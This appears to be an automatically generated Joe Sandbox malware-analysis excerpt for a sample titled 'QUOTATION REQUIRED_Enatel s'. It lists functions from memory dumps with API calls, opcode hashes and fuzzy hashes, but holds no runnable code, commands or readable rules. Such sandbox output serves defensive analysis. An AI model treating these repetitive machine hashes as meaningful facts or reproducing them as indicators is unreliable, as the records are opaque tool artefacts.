                                                                                                                                              • API ID: ResumeThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                              • Opcode ID: 1701332451adb10d2a97dac3e1c0e050854904d303940ce363d52a04ce875528
                                                                                                                                              • Instruction ID: 857c643a7129316a01f6c320750aa0b7916a3e3d26c07dfd122a10d42c56f598
                                                                                                                                              • Opcode Fuzzy Hash: 1701332451adb10d2a97dac3e1c0e050854904d303940ce363d52a04ce875528
                                                                                                                                              • Instruction Fuzzy Hash: 62113A71D003498FDB10DFAAC84579EFBF5AF88624F148419D519A7240CB756944CFA4
                                                                                                                                              Function 06D07C28 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D0F855
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessagePost
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 410705778-0
                                                                                                                                              • Opcode ID: 4e2f1f10b6db1ed9649e6b292bd92b56e7746a777e2a26d930c6fd054c6ad4ea
                                                                                                                                              • Instruction ID: d2044d5d422d1f273cb9c89129dc4f0d60b553e096c686d1586091fabba783f8
                                                                                                                                              • Opcode Fuzzy Hash: 4e2f1f10b6db1ed9649e6b292bd92b56e7746a777e2a26d930c6fd054c6ad4ea
                                                                                                                                              • Instruction Fuzzy Hash: 701106B5800349DFDB60DF9AC884BDEBBF8FB48714F208419E918A7240C375A944CFA1
                                                                                                                                              Function 024DB460 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 024DB4C6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1631854951.00000000024D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_24d0000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                              • Opcode ID: 4bb65b8416e2df8a181fb9b25d5ab7c507186396094620ec945d3918b97cea54
                                                                                                                                              • Instruction ID: 4dbb6ca41c4993fc1d26729abcd43f5e66517d26dfd5d6aac44060bed40a0303
                                                                                                                                              • Opcode Fuzzy Hash: 4bb65b8416e2df8a181fb9b25d5ab7c507186396094620ec945d3918b97cea54
                                                                                                                                              • Instruction Fuzzy Hash: 1711E0B5C003498FDB10DF9AD844BDEFBF4EF88628F11842AD819A7611D379A545CFA1
                                                                                                                                              Function 06D0F7F1 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D0F855
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessagePost
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 410705778-0
                                                                                                                                              • Opcode ID: 5064ec1c5a8211272333a81782391aa1f0c5a8a6aef26c176e3ae2ce56a4cd88
                                                                                                                                              • Instruction ID: 520f3587385a03f7c210e450c685b7d1c44ec885a90a4797145f0cd9c6ce2672
                                                                                                                                              • Opcode Fuzzy Hash: 5064ec1c5a8211272333a81782391aa1f0c5a8a6aef26c176e3ae2ce56a4cd88
                                                                                                                                              • Instruction Fuzzy Hash: 1411E3B5800349DFDB60DF9AC884BDEBBF4EB48324F20841AE958A3640C3796554CFA0
                                                                                                                                              Function 04D31013 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: S_?
                                                                                                                                              • API String ID: 0-452863325
                                                                                                                                              • Opcode ID: b227c7aa6597cc0d96aed57f460b22a6a2033d2758eeb874a92830ade561ae2f
                                                                                                                                              • Instruction ID: e7e094069e87b7e33e8f29a9d2be388d9b65e4f068cae9c0419d77ace05ea9f6
                                                                                                                                              • Opcode Fuzzy Hash: b227c7aa6597cc0d96aed57f460b22a6a2033d2758eeb874a92830ade561ae2f
                                                                                                                                              • Instruction Fuzzy Hash: E54132B1D05348CFDB20CFA9C980ACDBFB1BF49704F25806AD409AB251D775AA4ACF91
                                                                                                                                              Function 04D320AC Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: S_?
                                                                                                                                              • API String ID: 0-452863325
                                                                                                                                              • Opcode ID: 2dee8c9ec9ea931ca839a6c4b55c97b719b44503052757ac089e4f38ba61be0e
                                                                                                                                              • Instruction ID: 5359b475fc02a967867f3b364932f0f2a212a54cffa31b4f0a753867692b7009
                                                                                                                                              • Opcode Fuzzy Hash: 2dee8c9ec9ea931ca839a6c4b55c97b719b44503052757ac089e4f38ba61be0e
                                                                                                                                              • Instruction Fuzzy Hash: FA41E1B1D01309DFDB20DFA9C984ACEBBF5BF48704F658069D409AB250D775AA46CF90
                                                                                                                                              Function 04D31034 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: S_?
                                                                                                                                              • API String ID: 0-452863325
                                                                                                                                              • Opcode ID: c8879a19ffb8eeabf09deb59afd31f56344f0f5ada2b3d7716b560b0c6b82dfc
                                                                                                                                              • Instruction ID: e5af24a2890b5227f0d2e657d4a4af17d07828db9c5245adaefd838082c43818
                                                                                                                                              • Opcode Fuzzy Hash: c8879a19ffb8eeabf09deb59afd31f56344f0f5ada2b3d7716b560b0c6b82dfc
                                                                                                                                              • Instruction Fuzzy Hash: 1F41E3B1D01309DFDB24DFA9C984A9DBBF5BF48705F248069D409BB200D775AA4ACF90
                                                                                                                                              Function 04D31FB0 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: S_?
                                                                                                                                              • API String ID: 0-452863325
                                                                                                                                              • Opcode ID: 6497dddc43bad9003768da781314ccf201d89ce6f760050593d04615e50370d4
                                                                                                                                              • Instruction ID: da4cf6e8446b7f5d85e1e8f0a9c7c5b62b8c090edb5f080e2581ab4c3e99549c
                                                                                                                                              • Opcode Fuzzy Hash: 6497dddc43bad9003768da781314ccf201d89ce6f760050593d04615e50370d4
                                                                                                                                              • Instruction Fuzzy Hash: A031F132B042408FDB10DB78E48459ABBF6EF85305B45C8AED8469B251EB71E80A8B91
                                                                                                                                              Function 04D31FA0 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: S_?
                                                                                                                                              • API String ID: 0-452863325
                                                                                                                                              • Opcode ID: f08f0dd6433e4ac6a5c298c3794126f30306294d79d1381f38fa72acfe41a932
                                                                                                                                              • Instruction ID: d86d37430e599741dee53fb0f42ffd11b446cc94376ba65947d307df3f1ed99c
                                                                                                                                              • Opcode Fuzzy Hash: f08f0dd6433e4ac6a5c298c3794126f30306294d79d1381f38fa72acfe41a932
                                                                                                                                              • Instruction Fuzzy Hash: 7A21FD327006418FD711DB28D4419AE7BF6EF85316B0489AED146DB7A1DF30EC0A8BA2
                                                                                                                                              Function 04D384C8 Relevance: .8, Instructions: 780COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c78f13d69a033cd994912989fa2d2f37d98eaa03df91fae493b4c21800d0d66c
                                                                                                                                              • Instruction ID: ae7229d396a91c8cb8c981e66ddac6a26a07160043ebd00c0c66550795da0cc9
                                                                                                                                              • Opcode Fuzzy Hash: c78f13d69a033cd994912989fa2d2f37d98eaa03df91fae493b4c21800d0d66c
                                                                                                                                              • Instruction Fuzzy Hash: 196230B4E00B81CADB30DF7494A83AD7BA1BB45301F50499FC2EACF294DB75A481DB25
                                                                                                                                              Function 04D3F7C8 Relevance: .3, Instructions: 320COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4bef3a5b8da2281509c42fbd2aab6f1a9676b50355aaa7e9497abaf0cac7dfae
                                                                                                                                              • Instruction ID: 8e7ccef9032419c2c1e353fd40765f2fdd80217ff3261e199dffdcb7df90f111
                                                                                                                                              • Opcode Fuzzy Hash: 4bef3a5b8da2281509c42fbd2aab6f1a9676b50355aaa7e9497abaf0cac7dfae
                                                                                                                                              • Instruction Fuzzy Hash: 59B13C35B002088BEB18EBB5D554AAE77E6FFC8705B2444ADD942AB390DF35EC41CB61
                                                                                                                                              Function 04D31B24 Relevance: .3, Instructions: 293COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1887518b55ecd91f02a620a0ff7bd2c130daa4515f8e8513e91429e101c2f154
                                                                                                                                              • Instruction ID: 8b3cfc23172081c7b5c534175722cefe677a305e3da2b7db7a8f445f85b29d07
                                                                                                                                              • Opcode Fuzzy Hash: 1887518b55ecd91f02a620a0ff7bd2c130daa4515f8e8513e91429e101c2f154
                                                                                                                                              • Instruction Fuzzy Hash: 6891EF71E05308DFDB18DFA5E84469EBFB2FF85301F10846AE445A7391DB34A816CBA1
                                                                                                                                              Function 0C380448 Relevance: .3, Instructions: 293COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1638199905.000000000C380000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C380000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c380000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5250f3dcb6c93f5ef8e7b453efba2d0e3dc1c9a9d2efb815a31990743147176d
                                                                                                                                              • Instruction ID: 8891b63a61c4684e04987d7d1927efea295e0ebb572666eb6a66d39be012ce25
                                                                                                                                              • Opcode Fuzzy Hash: 5250f3dcb6c93f5ef8e7b453efba2d0e3dc1c9a9d2efb815a31990743147176d
                                                                                                                                              • Instruction Fuzzy Hash: 94B16074B112049FDB18EB69D594BAEBBF6EF88700F244069E505AB3A5CB30ED49CF50
                                                                                                                                              Function 04D399E8 Relevance: .2, Instructions: 245COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cbb41468b298d443f7feb1255e5987cb9673e150907e5a4adcd62f98b6615dbc
                                                                                                                                              • Instruction ID: d8ea1919f65e22ff6d2281fb72dced305a0d8636932bbf134328ef0920deb294
                                                                                                                                              • Opcode Fuzzy Hash: cbb41468b298d443f7feb1255e5987cb9673e150907e5a4adcd62f98b6615dbc
                                                                                                                                              • Instruction Fuzzy Hash: 4B9158707002048FDB18EB75C490B6E77A2FB85206F10896AE55A8B3A2DB74FC42CB61
                                                                                                                                              Function 0897F570 Relevance: .2, Instructions: 244COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6b04e90f8f791d3ee934fa129e358f4a3ad4f2560cc2c6f8acbbaa0848958c55
                                                                                                                                              • Instruction ID: a44b2c8e1ac87395bbabb261c4524cfc16d2d47a25b7bbaea11e6b91bcd81263
                                                                                                                                              • Opcode Fuzzy Hash: 6b04e90f8f791d3ee934fa129e358f4a3ad4f2560cc2c6f8acbbaa0848958c55
                                                                                                                                              • Instruction Fuzzy Hash: DD91A275A00619CFDB04EF68C884AAEBBB5FF84701F1585A9E405EB361DB31EC41CBA0
                                                                                                                                              Function 0897B268 Relevance: .2, Instructions: 189COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: dba7cb45693b2bfb14507bedbe591545a79ef2d48b28812cbf7ad61013915c7e
                                                                                                                                              • Instruction ID: 6d05a7d9482f6841c6870af174b466e140b4700884c5517cf4e44009fc4e175c
                                                                                                                                              • Opcode Fuzzy Hash: dba7cb45693b2bfb14507bedbe591545a79ef2d48b28812cbf7ad61013915c7e
                                                                                                                                              • Instruction Fuzzy Hash: B851F131E0521ACFCB14EFB8C88467E7BB6AFC1236F1545A9D405D7361EB30E88287A1
                                                                                                                                              Function 04D3A078 Relevance: .2, Instructions: 183COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 590dd9c40cdd5ed41d3a58c4072a6834b2fc7680ade22d6cc3852d46ce343a2c
                                                                                                                                              • Instruction ID: e67074ba44265d8b276d9a7fd38887c22d7b944761d58b6c0c5680f8e187596b
                                                                                                                                              • Opcode Fuzzy Hash: 590dd9c40cdd5ed41d3a58c4072a6834b2fc7680ade22d6cc3852d46ce343a2c
                                                                                                                                              • Instruction Fuzzy Hash: 8F716C34B006098FDB14DFA9D8587ADBBF1FF88301F118569E856A7390EB34AD85CB90
                                                                                                                                              Function 04D377C0 Relevance: .2, Instructions: 168COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b28f001ac566aad382a95f2c20a6c95aa62a190216f481cf18ad33a5045f6022
                                                                                                                                              • Instruction ID: eb3c7558e625e31abcbc3ed20046b85d63d9d169185cf55ecb360b061fc57b9f
                                                                                                                                              • Opcode Fuzzy Hash: b28f001ac566aad382a95f2c20a6c95aa62a190216f481cf18ad33a5045f6022
                                                                                                                                              • Instruction Fuzzy Hash: 84717C78A01608AFCB15DF69D884DAEBBB6FF49715B114099F901AB361DB31EC81CF50
                                                                                                                                              Function 04D34980 Relevance: .2, Instructions: 166COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4d4993df9557d7c046afb978ce5f083062061c80ed851499edc8e850a43bcd54
                                                                                                                                              • Instruction ID: 44f61a83828cc8743679c63c2829bbcd95520f2581bee38ff48d0d4bd96b9b0b
                                                                                                                                              • Opcode Fuzzy Hash: 4d4993df9557d7c046afb978ce5f083062061c80ed851499edc8e850a43bcd54
                                                                                                                                              • Instruction Fuzzy Hash: F751AF71A002059FEB11EFA5E4602AEB7F6FF88306F14456ED50AE7240EB31F905CBA1
                                                                                                                                              Function 04D3C0F4 Relevance: .2, Instructions: 155COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a1473ef65c08df897e620703202ed9612f4a9632488a9787c63ab594771f0d40
                                                                                                                                              • Instruction ID: f7ebde56b862e4a583db31f54b9f8dd6944bf4c1c19ea85ebbc67b4d5735a9e3
                                                                                                                                              • Opcode Fuzzy Hash: a1473ef65c08df897e620703202ed9612f4a9632488a9787c63ab594771f0d40
                                                                                                                                              • Instruction Fuzzy Hash: 0B51D135B102058FDB04EFB9D848A6EBBF6FFC4721B148969E415D7351EB30AD0587A0
                                                                                                                                              Function 04D30FF8 Relevance: .2, Instructions: 155COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e624b098f733ca8f6f474494320cb0df3f81532cb12dd0235e55da7a22057f7f
                                                                                                                                              • Instruction ID: 53602df88cff371780155767cb1182c9a30b097866f88426d7d35c6d77e208b6
                                                                                                                                              • Opcode Fuzzy Hash: e624b098f733ca8f6f474494320cb0df3f81532cb12dd0235e55da7a22057f7f
                                                                                                                                              • Instruction Fuzzy Hash: 04519F75E002099FDF14EFAAD804AAFBBF9EF88301F10842AD455E3250DB74A901CBA1
                                                                                                                                              Function 04D3B14F Relevance: .2, Instructions: 154COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 538ade3d4bf38356d4c957fe1d234c957640c3e5e2371fe0a8baa325ca53139c
                                                                                                                                              • Instruction ID: 8bbb2a7a7831a4c00faab9e99a5f8a44acd44d087b704fcd12a9b7f9bc524e75
                                                                                                                                              • Opcode Fuzzy Hash: 538ade3d4bf38356d4c957fe1d234c957640c3e5e2371fe0a8baa325ca53139c
                                                                                                                                              • Instruction Fuzzy Hash: 9D517C747006049FDB24DF75C494BAEB7A2FF85316F108A6AD46A8B3A2DB70F805CB50
                                                                                                                                              Function 04D34B70 Relevance: .1, Instructions: 149COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c8d172840424943b6a944093b9d617050d5776965a867c38dd6a6ccc9b6b070d
                                                                                                                                              • Instruction ID: 02b10048d47397d55749aa8e084cf42d59d760e64d8987582b56e78c0195e2f1
                                                                                                                                              • Opcode Fuzzy Hash: c8d172840424943b6a944093b9d617050d5776965a867c38dd6a6ccc9b6b070d
                                                                                                                                              • Instruction Fuzzy Hash: 8451D431A003068BEB04EF29D8807D9B762FFC5705F14C679D8196F289DFB5694A8BA1
                                                                                                                                              Function 04D34B60 Relevance: .1, Instructions: 142COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c95d40bdb65ca8f2bd0b43853581f7373ad2c3e2b306e385272fbb9f761d5cab
                                                                                                                                              • Instruction ID: dccf4090efed73f4ff92b1071978e1720dec0307ca225284f33518158b8f3380
                                                                                                                                              • Opcode Fuzzy Hash: c95d40bdb65ca8f2bd0b43853581f7373ad2c3e2b306e385272fbb9f761d5cab
                                                                                                                                              • Instruction Fuzzy Hash: 3351C631A003028BEB04EF68D8907D9B762FFC5305F14C679DD196F299DFB1694A8BA1
                                                                                                                                              Function 0897AE40 Relevance: .1, Instructions: 141COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2b94df23c3e184306c58b0fa919b0b552bb0a04478e730999ae02e9f12c39c2c
                                                                                                                                              • Instruction ID: 3a42300b07a27c114e6999df78a78da3bb63d919a6b14e260724d6686453cd9e
                                                                                                                                              • Opcode Fuzzy Hash: 2b94df23c3e184306c58b0fa919b0b552bb0a04478e730999ae02e9f12c39c2c
                                                                                                                                              • Instruction Fuzzy Hash: 46511835B10118DFDB14EF64D959AAD7BF6EF88716F158469E802AB3A0CB319C41CFA0
                                                                                                                                              Function 04D3AEE0 Relevance: .1, Instructions: 138COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0ed8ca53f259548ff4f2918c04a1504c3b08be428484097691d262b9b623fcb6
                                                                                                                                              • Instruction ID: 7e80a57e57f15fea11e45e7ffa9b1a67336835700377415d767cb97434f54515
                                                                                                                                              • Opcode Fuzzy Hash: 0ed8ca53f259548ff4f2918c04a1504c3b08be428484097691d262b9b623fcb6
                                                                                                                                              • Instruction Fuzzy Hash: 3D518E75B00605DFC708EF69D490969B7B2FF86306B6185ADE4159B351CB32FC42CBA1
                                                                                                                                              Function 04D37CA0 Relevance: .1, Instructions: 135COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d1e2eb894a0d51d50d92d78d72cc1be171188755f99ec73d37b21b892c8db3b8
                                                                                                                                              • Instruction ID: d8d4741a7bfc843bb9e71734708419178ecfe11a1638105cb33e5a031eb6ce61
                                                                                                                                              • Opcode Fuzzy Hash: d1e2eb894a0d51d50d92d78d72cc1be171188755f99ec73d37b21b892c8db3b8
                                                                                                                                              • Instruction Fuzzy Hash: 6B51D975A1060ADFCB04DFA8D9848DDF7B5FF89300B11C25AE915AB324EB30AA55CF90
